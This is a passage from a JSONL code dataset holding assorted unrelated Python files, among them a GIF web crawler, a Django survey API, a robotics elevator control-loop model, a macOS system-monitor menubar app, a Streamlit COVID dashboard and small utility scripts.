args.snapshot_dataset_id)\n","sub_path":"data_steward/tools/migrate_cdm52_to_cdm531.py","file_name":"migrate_cdm52_to_cdm531.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"399140684","text":"from bst_class import BinarySearchTree\n\nINPUT_FILE = \"task3.in\"\n\nt = BinarySearchTree()\n\nwith open(INPUT_FILE) as f:\n s = f.readline()\n while s:\n t.insert(int(s))\n s = f.readline()\n\nx = int(input())\n\nif x in t:\n t.remove(x)\n print(\"{} was found in tree and removed successfully.\".format(x))\nelse:\n print(\"{} was not found in tree.\".format(x))\n\nt.traverses()\n","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"89379998","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport bs4\nimport os\nimport requests\nimport shutil\nimport sys\nsys.path.append('../template')\nimport mparameter\n\n\nPAGE_SIZE = 100\n\nOUTDIR = 'temp'\nOUTPATH = os.getcwd()\nOUTPATH = os.path.join(OUTPATH, OUTDIR)\nif os.path.exists(OUTPATH):\n shutil.rmtree(OUTPATH)\nos.mkdir(OUTPATH)\n\n\nclass BaozouSpider(object):\n\n def __init__(self, index):\n self.index = index\n self.url = \"http://baozoumanhua.com/gif/month/page/\"\n\n def retrieve_page(self):\n url = self.url + str(self.index)\n pm = mparameter.Parameter()\n headers = pm.get_headers()\n proxies = pm.get_proxies()\n soup = \"FLAG\"\n try:\n response = requests.get(\n url, proxies, headers=headers, timeout=5)\n status = response.status_code\n if status == 200:\n soup = bs4.BeautifulSoup(response.text, \"lxml\")\n else:\n print(\"%s error to reach the server %s\" % (status, url))\n except Exception:\n print(\"Error happens! Please check your requests.\")\n return soup\n\n def get_imgurl(self, soup):\n temp = soup.select('.img-wrap img')\n imgurl = [img['src'] for img in temp]\n return imgurl\n\n def get_img(self, url, fileloc):\n pm = mparameter.Parameter()\n headers = pm.get_headers()\n proxies = pm.get_proxies()\n try:\n response = requests.get(url, proxies, headers=headers,\n timeout=5, stream=True)\n status = response.status_code\n if status == 200:\n with open(fileloc, 'wb') as f:\n response.raw.decode_content = True\n shutil.copyfileobj(response.raw, f)\n for chunk in response.iter_content(1024):\n f.write(chunk)\n else:\n print(\"%s error to reach the server %s\" % (status, url))\n except Exception:\n print(\"Error happens! Please check your requests.\")\n\n def retrieve_content(self, soup):\n if soup != \"FLAG\":\n num = 1\n imgurl = self.get_imgurl(soup)\n print((\"Gif number in page %d: %d\" % (self.index, len(imgurl))))\n for x in imgurl:\n imgname = str(self.index) + '_' + str(num)\n fileloc = OUTPATH + os.sep + imgname + \".gif\"\n print(fileloc)\n num += 1\n self.get_img(x, fileloc)\n\n\ndef main():\n print(\"\"\"\n ###############################\n\n BaoZou Gif Crawler\n Author: Ke Yi\n\n ###############################\n \"\"\")\n print(\"Baozou Gif Crawler Begins...\")\n for i in range(1, PAGE_SIZE + 1):\n my_spider = BaozouSpider(i)\n my_soup = my_spider.retrieve_page()\n my_spider.retrieve_content(my_soup)\n print(\"Baozou Gif Crawler Ends.\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Spider_Projects/baozou/baozou.py","file_name":"baozou.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"23981532","text":"# -*- coding: utf-8 -*-\r\n\r\nimport base64\r\nimport os\r\nimport sys\r\nimport requests\r\nimport json\r\nfrom pprint import pprint\r\n\r\nupload_endpoint = \"http://localhost:5000/api/v1/images/add\"\r\n\r\ndef encodeBody( path=None ):\r\n with open( path, \"rb\" ) as image_file:\r\n encoded_string = base64.b64encode( image_file.read() )\r\n base64_message = encoded_string.decode( 'utf-8' )\r\n return { \"filename\": os.path.basename( path ), \"img\": base64_message }\r\n\r\n\r\ndef postImage( path=None ):\r\n r = requests.post( upload_endpoint, verify=False, json=encodeBody( path=path ) )\r\n pprint( r.json() )\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n image_path = sys.argv[1]\r\n if os.path.isdir( image_path ):\r\n for ( dirpath, dirnames, filenames ) in os.walk( image_path ):\r\n for filename in filenames:\r\n postImage( path=os.path.join( dirpath, filename ) )\r\n else:\r\n postImage( path=image_path )\r\n \r\n \r\n ","sub_path":"add_image.py","file_name":"add_image.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"225836212","text":"#!/usr/bin/python\n\nfrom frc971.control_loops.python import control_loop\nfrom frc971.control_loops.python import controls\nfrom frc971.control_loops.python import polytope\nimport numpy\nimport sys\nimport matplotlib\nfrom matplotlib import pylab\n\nimport gflags\nimport glog\n\nFLAGS = gflags.FLAGS\n\ngflags.DEFINE_bool('plot', False, 'If true, plot the loop response.')\n\n\nclass Elevator(control_loop.ControlLoop):\n def __init__(self, name=\"Elevator\", mass=None):\n super(Elevator, self).__init__(name)\n # Stall Torque in N m\n self.stall_torque = 0.476\n # Stall Current in Amps\n self.stall_current = 80.730\n # Free Speed in RPM\n self.free_speed = 13906.0\n # Free Current in Amps\n self.free_current = 5.820\n # Mass of the elevator\n if mass is None:\n self.mass = 13.0\n else:\n self.mass = mass\n\n # Resistance of the motor\n self.R = 12.0 / self.stall_current\n # Motor velocity constant\n self.Kv = ((self.free_speed / 60.0 * 2.0 * numpy.pi) /\n (12.0 - self.R * self.free_current))\n # Torque constant\n self.Kt = self.stall_torque / self.stall_current\n # Gear ratio\n self.G = (56.0 / 12.0) * (84.0 / 14.0)\n # Pulley diameter\n self.r = 32 * 0.005 / numpy.pi / 2.0\n # Control loop time step\n self.dt = 0.005\n\n # Elevator left/right spring constant (N/m)\n self.spring = 800.0\n\n # State is [average position, average velocity,\n # position difference/2, velocity difference/2]\n # Input is [V_left, V_right]\n\n C1 = self.spring / (self.mass * 0.5)\n C2 = self.Kt * self.G / (self.mass * 0.5 * self.r * self.R)\n C3 = self.G * self.G * self.Kt / (\n self.R * self.r * self.r * self.mass * 0.5 * self.Kv)\n\n self.A_continuous = numpy.matrix(\n [[0, 1, 0, 0],\n [0, -C3, 0, 0],\n [0, 0, 0, 1],\n [0, 0, -C1 * 2.0, -C3]])\n\n glog.debug('Full speed is', C2 / C3 * 12.0)\n\n # Start with the unmodified input\n self.B_continuous = numpy.matrix(\n [[0, 0],\n [C2 / 2.0, C2 / 2.0],\n [0, 0],\n [C2 / 2.0, -C2 / 2.0]])\n\n self.C = numpy.matrix([[1, 0, 1, 0],\n [1, 0, -1, 0]])\n self.D = numpy.matrix([[0, 0],\n [0, 0]])\n\n self.A, self.B = self.ContinuousToDiscrete(\n self.A_continuous, self.B_continuous, self.dt)\n\n glog.debug(repr(self.A))\n\n controllability = controls.ctrb(self.A, self.B)\n glog.debug('Rank of augmented controllability matrix: %d',\n numpy.linalg.matrix_rank(controllability))\n\n q_pos = 0.02\n q_vel = 0.400\n q_pos_diff = 0.01\n q_vel_diff = 0.45\n self.Q = numpy.matrix([[(1.0 / (q_pos ** 2.0)), 0.0, 0.0, 0.0],\n [0.0, (1.0 / (q_vel ** 2.0)), 0.0, 0.0],\n [0.0, 0.0, (1.0 / (q_pos_diff ** 2.0)), 0.0],\n [0.0, 0.0, 0.0, (1.0 / (q_vel_diff ** 2.0))]])\n\n self.R = numpy.matrix([[(1.0 / (12.0 ** 2.0)), 0.0],\n [0.0, 1.0 / (12.0 ** 2.0)]])\n self.K = controls.dlqr(self.A, self.B, self.Q, self.R)\n glog.debug(repr(self.K))\n\n glog.debug(repr(numpy.linalg.eig(self.A - self.B * self.K)[0]))\n\n self.rpl = 0.20\n self.ipl = 0.05\n self.PlaceObserverPoles([self.rpl + 1j * self.ipl,\n self.rpl + 1j * self.ipl,\n self.rpl - 1j * self.ipl,\n self.rpl - 1j * self.ipl])\n\n # The box formed by U_min and U_max must encompass all possible values,\n # or else Austin's code gets angry.\n self.U_max = numpy.matrix([[12.0], [12.0]])\n self.U_min = numpy.matrix([[-12.0], [-12.0]])\n\n self.InitializeState()\n\n\ndef CapU(U):\n if U[0, 0] - U[1, 0] > 24:\n return numpy.matrix([[12], [-12]])\n elif U[0, 0] - U[1, 0] < -24:\n return numpy.matrix([[-12], [12]])\n else:\n max_u = max(U[0, 0], U[1, 0])\n min_u = min(U[0, 0], U[1, 0])\n if max_u > 12:\n return U - (max_u - 12)\n if min_u < -12:\n return U - (min_u + 12)\n return U\n\n\ndef run_test(elevator, initial_X, goal, max_separation_error=0.01,\n show_graph=False, iterations=200, controller_elevator=None,\n observer_elevator=None):\n \"\"\"Runs the elevator plant with an initial condition and goal.\n\n The tests themselves are not terribly sophisticated; I just test for\n whether the goal has been reached and whether the separation goes\n outside of the initial and goal values by more than max_separation_error.\n Prints out something for a failure of either condition and returns\n False if tests fail.\n Args:\n elevator: elevator object to use.\n initial_X: starting state.\n goal: goal state.\n show_graph: Whether or not to display a graph showing the changing\n states and voltages.\n iterations: Number of timesteps to run the model for.\n controller_elevator: elevator object to get K from, or None if we should\n use elevator.\n observer_elevator: elevator object to use for the observer, or None if we\n should use the actual state.\n \"\"\"\n\n elevator.X = initial_X\n\n if controller_elevator is None:\n controller_elevator = elevator\n\n if observer_elevator is not None:\n observer_elevator.X_hat = initial_X + 0.01\n observer_elevator.X_hat = initial_X\n\n # Various lists for graphing things.\n t = []\n x_avg = []\n x_sep = []\n x_hat_avg = []\n x_hat_sep = []\n v_avg = []\n v_sep = []\n u_left = []\n u_right = []\n\n sep_plot_gain = 100.0\n\n for i in xrange(iterations):\n X_hat = elevator.X\n if observer_elevator is not None:\n X_hat = observer_elevator.X_hat\n x_hat_avg.append(observer_elevator.X_hat[0, 0])\n x_hat_sep.append(observer_elevator.X_hat[2, 0] * sep_plot_gain)\n U = controller_elevator.K * (goal - X_hat)\n U = CapU(U)\n x_avg.append(elevator.X[0, 0])\n v_avg.append(elevator.X[1, 0])\n x_sep.append(elevator.X[2, 0] * sep_plot_gain)\n v_sep.append(elevator.X[3, 0])\n if observer_elevator is not None:\n observer_elevator.PredictObserver(U)\n elevator.Update(U)\n if observer_elevator is not None:\n observer_elevator.Y = elevator.Y\n observer_elevator.CorrectObserver(U)\n\n t.append(i * elevator.dt)\n u_left.append(U[0, 0])\n u_right.append(U[1, 0])\n\n glog.debug(repr(numpy.linalg.inv(elevator.A)))\n glog.debug('delta time is %f', elevator.dt)\n glog.debug('Velocity at t=0 is %f %f %f %f', x_avg[0], v_avg[0], x_sep[0], v_sep[0])\n glog.debug('Velocity at t=1+dt is %f %f %f %f', x_avg[1], v_avg[1], x_sep[1], v_sep[1])\n\n if show_graph:\n pylab.subplot(2, 1, 1)\n pylab.plot(t, x_avg, label='x avg')\n pylab.plot(t, x_sep, label='x sep')\n if observer_elevator is not None:\n pylab.plot(t, x_hat_avg, label='x_hat avg')\n pylab.plot(t, x_hat_sep, label='x_hat sep')\n pylab.legend()\n\n pylab.subplot(2, 1, 2)\n pylab.plot(t, u_left, label='u left')\n pylab.plot(t, u_right, label='u right')\n pylab.legend()\n pylab.show()\n\n\ndef main(argv):\n loaded_mass = 25\n #loaded_mass = 0\n elevator = Elevator(mass=13 + loaded_mass)\n elevator_controller = Elevator(mass=13 + 15)\n observer_elevator = Elevator(mass=13 + 15)\n #observer_elevator = None\n\n # Test moving the elevator with constant separation.\n initial_X = numpy.matrix([[0.0], [0.0], [0.01], [0.0]])\n #initial_X = numpy.matrix([[0.0], [0.0], [0.00], [0.0]])\n R = numpy.matrix([[1.0], [0.0], [0.0], [0.0]])\n run_test(elevator, initial_X, R, controller_elevator=elevator_controller,\n observer_elevator=observer_elevator)\n\n # Write the generated constants out to a file.\n if len(argv) != 3:\n glog.fatal('Expected .h file name and .cc file name for the elevator.')\n else:\n namespaces = ['y2015', 'control_loops', 'fridge']\n elevator = Elevator(\"Elevator\")\n loop_writer = control_loop.ControlLoopWriter(\"Elevator\", [elevator],\n namespaces=namespaces)\n if argv[1][-3:] == '.cc':\n loop_writer.Write(argv[2], argv[1])\n else:\n loop_writer.Write(argv[1], argv[2])\n\nif __name__ == '__main__':\n argv = FLAGS(sys.argv)\n glog.init()\n sys.exit(main(argv))\n","sub_path":"2017/code-snapshot/y2015/control_loops/python/elevator.py","file_name":"elevator.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"305117475","text":"# MIT License\n#\n# Copyright (c) 2017 Ray Chen \n\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nimport math\nimport psutil\nfrom PyObjCTools import AppHelper\nfrom Foundation import NSTimer, NSRunLoop\nfrom AppKit import NSApplication, NSStatusBar, NSMenu, NSMenuItem, \\\n NSEventTrackingRunLoopMode\n\n\ndef bytes2human(n):\n # Credits to /u/cyberspacecowboy on reddit\n # https://www.reddit.com/r/Python/comments/5xukpd/-/dem5k12/\n symbols = (' B', ' KiB', ' MiB', ' GiB', ' TiB', ' PiB', ' EiB', ' ZiB',\n ' YiB')\n i = math.floor(math.log(abs(n)+1, 2) / 10)\n return '%.1f%s' % (n/2**(i*10), symbols[i])\n\n\nclass Harold(NSApplication):\n\n def finishLaunching(self):\n self._setup_menuBar()\n\n # Create a timer which fires the update_ method every 1second,\n # and add it to the runloop\n NSRunLoop.currentRunLoop().addTimer_forMode_(\n NSTimer\n .scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(\n 1, self, 'update:', '', True\n ),\n NSEventTrackingRunLoopMode\n )\n\n print('Harold is now running.')\n print('CTRL+C does not work here.')\n print('You can quit through the menubar (Harold -> Quit).')\n\n def update_(self, timer):\n\n # System\n cpu_usage = psutil.cpu_percent()\n ram_usage = psutil.virtual_memory().percent\n avail_mem = bytes2human(psutil.virtual_memory().available)\n self.CPU_USAGE.setTitle_('CPU Usage: {}%'.format(cpu_usage))\n self.RAM_USAGE.setTitle_('RAM Usage: {}%'.format(ram_usage))\n self.RAM_AVAILABLE.setTitle_('Available Memory: {}'.format(avail_mem))\n\n # Disk I/O\n disk_io = psutil.disk_io_counters()\n disk_data_read = bytes2human(disk_io.read_bytes)\n disk_data_written = bytes2human(disk_io.write_bytes)\n\n self.DATA_READ.setTitle_('Read: {}'.format(disk_data_read))\n self.DATA_WRITTEN.setTitle_('Written: {}'.format(disk_data_written))\n\n # Network\n network_io = psutil.net_io_counters()\n network_recv = bytes2human(network_io.bytes_recv)\n network_sent = bytes2human(network_io.bytes_sent)\n\n self.NETWORK_RECV.setTitle_('Received: {}'.format(network_recv))\n self.NETWORK_SENT.setTitle_('Sent: {}'.format(network_sent))\n\n def _setup_menuBar(self):\n statusBar = NSStatusBar.systemStatusBar()\n self.statusItem = statusBar.statusItemWithLength_(-1)\n self.menuBar = NSMenu.alloc().init()\n\n self.statusItem.setTitle_('Harold')\n\n # Labels/buttons\n self.SYSTEM = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n 'System', 'doNothing:', ''\n )\n self.DISKIO = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n 'Disk I/O', 'doNothing:', ''\n )\n self.NETWORK = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n 'Network', 'doNothing:', ''\n )\n self.QUIT = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n 'Quit', 'terminate:', ''\n )\n\n # System\n self.CPU_USAGE = self._create_empty_menu_item()\n self.RAM_USAGE = self._create_empty_menu_item()\n self.RAM_AVAILABLE = self._create_empty_menu_item()\n\n # Disk I/O\n self.DATA_READ = self._create_empty_menu_item()\n self.DATA_WRITTEN = self._create_empty_menu_item()\n\n # Network\n self.NETWORK_RECV = self._create_empty_menu_item()\n self.NETWORK_SENT = self._create_empty_menu_item()\n\n '''\n Add our items to the menuBar - yields the following output:\n\n Harold\n System\n CPU Usage\n RAM Usage\n Available Memory\n Disk I/O\n Read\n Written\n Network\n Received\n Sent\n -----------------------\n Quit\n '''\n self.menuBar.addItem_(self.SYSTEM) # system label\n self.menuBar.addItem_(self.CPU_USAGE)\n self.menuBar.addItem_(self.RAM_USAGE)\n self.menuBar.addItem_(self.RAM_AVAILABLE)\n\n self.menuBar.addItem_(self.DISKIO) # disk I/O label\n self.menuBar.addItem_(self.DATA_READ)\n self.menuBar.addItem_(self.DATA_WRITTEN)\n\n self.menuBar.addItem_(self.NETWORK) # network label\n self.menuBar.addItem_(self.NETWORK_RECV)\n self.menuBar.addItem_(self.NETWORK_SENT)\n\n self.menuBar.addItem_(NSMenuItem.separatorItem()) # seperator\n self.menuBar.addItem_(self.QUIT) # quit button\n\n # Add menu to status bar\n self.statusItem.setMenu_(self.menuBar)\n\n def _create_empty_menu_item(self):\n return NSMenuItem \\\n .alloc().initWithTitle_action_keyEquivalent_('', '', '')\n\n def doNothing_(self, sender):\n # hack to enable menuItems by passing them this method as action\n # setEnabled_ isn't working, so this should do for now (achieves\n # the same thing)\n pass\n\n\nif __name__ == '__main__':\n app = Harold.sharedApplication()\n AppHelper.runEventLoop()\n","sub_path":"harold.py","file_name":"harold.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"96232164","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.express as px\ndef main():\n\tdf = load_data()\n\tst.title('covid-19 country-wise tracking and comparison')\n\tcountries = df.Country.unique()\n\tselected_countries = st.sidebar.multiselect('Select Countries to compare', countries)\n\tif selected_countries:\n\t\tsubset_df = df[df.Country.isin(selected_countries)]\n\telse:\n\t\tsubset_df = df[df.Country.isin(['India'])]\n\tfig1 = px.line(subset_df, x=\"Date\", y=\"Confirmed\", color='Country')\n\tfig2 = px.line(subset_df, x=\"Date\", y=\"Recovered\", color='Country')\n\tfig3 = px.line(subset_df, x=\"Date\", y=\"Deaths\", color='Country')\n\tst.header('Confirmed Cases')\n\tst.write(fig1)\n\tst.header('Recovered Cases')\n\tst.write(fig2)\n\tst.header('Deaths')\n\tst.write(fig3)\n\tst.markdown('''---''')\n\tst.markdown('Contributors')\n\tst.markdown('Supan Shah - https://github.com/Supan14')\n\tst.markdown('Harsh Thakkar - https://github.com/ht2631999')\n\t\n@st.cache\ndef load_data():\n\treturn pd.read_csv('https://raw.githubusercontent.com/datasets/covid-19/master/data/countries-aggregated.csv')\nif __name__ == '__main__':\n\tmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"267649640","text":"import struct\n\ntype_name_to_struct = {\n 'uint8': 'B',\n 'uint16': 'H',\n 'uint32': 'I',\n 'uint64': 'Q',\n 'int8': 'b',\n 'int16': 'h',\n 'int32': 'i',\n 'int64': 'q',\n 'float': 'f',\n 'double': 'd',\n 'char': 'c',\n 'str': 's',\n}\n\ntype_lengths = {\n 'uint8': 1,\n 'uint16': 2,\n 'uint32': 4,\n 'uint64': 8,\n 'int8': 1,\n 'int16': 2,\n 'int32': 4,\n 'int64': 8,\n 'float': 4,\n 'double': 8,\n 'char': 1,\n 'str': 1,\n}\n\n\nclass BinaryReader:\n def __init__(self, stream, endianness='little'):\n self.stream = stream\n self.endian = '<' if endianness == 'little' else '>'\n\n def read(self, data_type, num=1):\n if num == 0:\n return b''\n\n length = type_lengths[data_type] * num\n fmt_str = '{}{}{}'.format(self.endian, num, type_name_to_struct[data_type])\n b = self.stream.read(length)\n if b == b'':\n raise IOError(\"End of stream reached\")\n\n # unpack returns a tuple even if the format string\n # has only one element\n if num > 1 and data_type != 'str':\n return struct.unpack(fmt_str, b)\n return struct.unpack(fmt_str, b)[0]\n\n def read_raw(self, data_type):\n return self.stream.read(type_lengths[data_type])\n\n\nclass BinaryWriter:\n def __init__(self, stream, endianness='little'):\n self.stream = stream\n self.endian = '<' if endianness == 'little' else '>'\n\n def write(self, values, data_type, num=1):\n fmt_str = '{}{}{}'.format(self.endian, num, type_name_to_struct[data_type])\n\n if num > 1 and data_type != 'str':\n b = struct.pack(fmt_str, *values)\n else:\n b = struct.pack(fmt_str, values)\n return self.stream.write(b)\n\n def write_raw(self, b):\n return self.stream.write(b)\n","sub_path":"pylas/lasio.py","file_name":"lasio.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"315723864","text":"#!/usr/bin/python3\n# 2018.01.21 20:46:41 CST\nimport cv2\n\n# Capturing video through webcam \nstream = cv2.VideoCapture('/Users/joao/Downloads/mixed.mp4')\n_, img = stream.read()\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n# red\n# mask = cv2.inRange(hsv,(136, 87, 110), (180, 255, 255))\n\n# blue\nmask = cv2.inRange(hsv,(94, 80, 110), (120, 255, 255))\n\ncv2.imshow(\"orange\", mask);cv2.waitKey();cv2.destroyAllWindows()","sub_path":"scripts/get-hsv-range.py","file_name":"get-hsv-range.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390048016","text":"# -*- coding: utf-8 -*-\r\n\r\n# =============================================================================\r\n# Created on Sat Aug 31 02:35:37 2019\r\n#\r\n# @author: Brénainn Woodsend\r\n#\r\n#\r\n# test_mesh_plot.py tests the contents of vtkplotlib.plots.MeshPlot.py.\r\n# Copyright (C) 2019 Brénainn Woodsend\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n# =============================================================================\r\n\r\n\r\nimport numpy as np\r\nimport sys\r\nimport os\r\nfrom pathlib2 import Path\r\n\r\nimport vtkplotlib as vpl\r\nfrom unittest import TestCase, skipUnless, main\r\n\r\npath = vpl.data.get_rabbit_stl()\r\n\r\n\r\nclass TestMeshPlot(TestCase):\r\n\r\n @skipUnless(vpl.NUMPY_STL_AVAILABLE, \"Requires numpy-stl\")\r\n def test_type_normalise(self):\r\n from stl.mesh import Mesh\r\n mesh = Mesh.from_file(path)\r\n vectors = mesh.vectors\r\n\r\n unique_points = set(tuple(i) for i in vectors.reshape(len(vectors) * 3, 3))\r\n points_enum = {point: i for (i, point) in enumerate(unique_points)}\r\n\r\n points = np.array(sorted(unique_points, key=points_enum.get))\r\n point_args = np.apply_along_axis(lambda x: points_enum[tuple(x)], -1, vectors)\r\n\r\n vpl.plots.MeshPlot.NUMPY_STL_AVAILABLE = False\r\n\r\n for fmt in (path, mesh, vectors, (points, point_args)):\r\n normalised = vpl.mesh_plot(fmt).vectors\r\n self.assertTrue(np.array_equal(normalised, vectors))\r\n\r\n vpl.plots.MeshPlot.NUMPY_STL_AVAILABLE = True\r\n\r\n vpl.close()\r\n\r\n vpl.plots.MeshPlot.test()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"venv/lib/python3.7/site-packages/vtkplotlib/tests/test_mesh_plot.py","file_name":"test_mesh_plot.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"21711594","text":"\"\"\"Surveys routes handler\"\"\"\n\nfrom django.core.exceptions import ValidationError\n\nfrom surveysAPI.models.survey import Survey\nfrom . import helper\n\n\ndef index(request, survey_id = None):\n \"\"\"Dispatches GET, POST and PATCH requests to surveys.\"\"\"\n request_body = {}\n\n # Expect and extract a JSON body from POST and PATCH requests\n if request.method == 'POST' or request.method == 'PATCH':\n request_body = helper.convert_request(request)\n\n if request_body is None:\n return helper.invalid_request('Your request did not contain valid JSON.')\n\n # A specific survey was requested\n if survey_id is not None:\n if request.method == 'GET':\n return show_single(request, survey_id)\n if request.method == 'PATCH':\n return update(survey_id, request_body)\n\n # No specific survey was requested\n else:\n if request.method == 'GET':\n return show(request)\n if request.method == 'POST':\n return create(request_body)\n\n return helper.invalid_route(request)\n\n\ndef show(request):\n \"\"\"Returns surveys created by any user.\"\"\"\n try:\n response = Survey.get_all(request.GET.get('per_page'), request.GET.get('page'))\n response['results'] = helper.convert_query_set(response['results'])\n\n return helper.success(response)\n\n except ValueError as e:\n return helper.invalid_request('At least one of the filters in your request was invalid.')\n\n\ndef show_single(request, survey_id):\n \"\"\"Returns the survey with the given id.\"\"\"\n if request.method != 'GET':\n return helper.invalid_route(request)\n\n try:\n survey = Survey.objects.get(pk=survey_id)\n return helper.success(helper.convert_single_object(survey))\n\n except Survey.DoesNotExist as dne:\n return helper.requested_object_not_found('survey id')\n\n\ndef create(request_body):\n \"\"\"Creates a new survey.\"\"\"\n user_id = request_body.get('user_id')\n name = request_body.get('name')\n places = request_body.get('places')\n\n try:\n survey = Survey.create(user_id, name, places)\n return helper.success(helper.convert_single_object(survey))\n\n except ValueError as e:\n return helper.invalid_request(\"The 'user_id' must be an integer.\")\n except ValidationError as ve:\n return helper.invalid_request(ve.message_dict)\n\n\ndef update(survey_id, request_body):\n \"\"\"Updates a survey.\"\"\"\n name = request_body.get('name')\n places = request_body.get('places')\n\n try:\n survey = Survey.objects.get(pk=survey_id)\n updated_survey = survey.update(name, places)\n if updated_survey is None:\n return helper.invalid_request('The number of places should not be lower than the current number of responses.')\n\n return helper.success(helper.convert_single_object(updated_survey))\n\n except Survey.DoesNotExist as dne:\n return helper.requested_object_not_found('survey id')\n except ValidationError as ve:\n return helper.invalid_request(ve.message_dict)\n\n\ndef responses(request, survey_id):\n \"\"\"Returns the responses submitted to the survey with the given id.\"\"\"\n if request.method != 'GET':\n return helper.invalid_route(request)\n\n try:\n survey = Survey.objects.get(pk=survey_id)\n\n response = survey.get_responses(request.GET.get('per_page'), request.GET.get('page'))\n response['results'] = helper.convert_query_set(response['results'])\n\n return helper.success(response)\n\n except Survey.DoesNotExist as dne:\n return helper.requested_object_not_found('survey id')\n except ValueError as e:\n return helper.invalid_request('At least one of the filters in your request was invalid.')","sub_path":"prolific/surveysAPI/views/surveys.py","file_name":"surveys.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372242258","text":"from LogFile import LogFile\nfrom ProgramOption import ProgramOption\n\n\ndef main():\n print(\"Welcome! A Program By Yair Ziv And Shadi Badaria\")\n logData= LogFile(input(\"Please enter the file path:\"))\n if logData.GetLogList():\n while True:\n program=ProgramOption(logData)\n program.print_options()\n program.exe_Function(input(\"\"))\n else:\n print(\"could not open file! Exiting....\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"MainPrg.py","file_name":"MainPrg.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"541314366","text":"from datetime import date\r\nimport datetime\r\n\r\n\r\nclass FedWriter: # Creates and manage writing of files in Federal Reserve common format\r\n\r\n\r\n def __init__(self, measure, location):\r\n # defines list to write\r\n # measureList is name vslue pair for each county\r\n self.measureName = measure\r\n self.measureList = []\r\n self.fileLocation = location\r\n\r\n def print(self):\r\n print(self.fileLocation)\r\n print(self.measureName)\r\n print(self.measureList)\r\n\r\n def leadingzero(self,num):\r\n returnvalue = ''\r\n if num < 10:\r\n returnvalue = '0'+str(num)\r\n else:\r\n returnvalue = str(num)\r\n return returnvalue\r\n\r\n def add(self, indate, inmeasure, incounty):\r\n measuredate = str(indate)\r\n measure = Measure()\r\n measure.setdate(indate)\r\n measure.setvalue(inmeasure)\r\n measure.setcounty(incounty)\r\n self.measureList.append(measure)\r\n\r\n def output_msr_county(self):\r\n amt = len(self.measureList)\r\n if amt>0:\r\n firstline = \"DATE\\t\"+self.measureName+\"\\r\"\r\n location = self.fileLocation+\"\\\\\"+self.measureName+\".txt\"\r\n file = open(location, 'w')\r\n file.write(firstline)\r\n\r\n counter = 0\r\n while counter <= amt-1:\r\n file.write(self.measureList[counter][0]+\"\\t\"+str(self.measureList[counter][1])+\"\\r\")\r\n counter += 1\r\n file.close()\r\n\r\n def output_msr_file(self):\r\n datelist=[]\r\n countylist =[]\r\n #print('Starting Date List:'+str(datetime.datetime.now()))\r\n 